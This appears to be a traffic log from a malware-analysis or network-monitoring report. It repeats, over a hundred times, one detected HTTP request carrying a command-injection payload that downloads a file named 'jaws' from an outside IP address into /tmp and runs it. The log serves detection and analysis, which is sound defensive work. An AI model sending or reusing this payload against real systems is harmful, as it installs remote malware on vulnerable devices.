Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
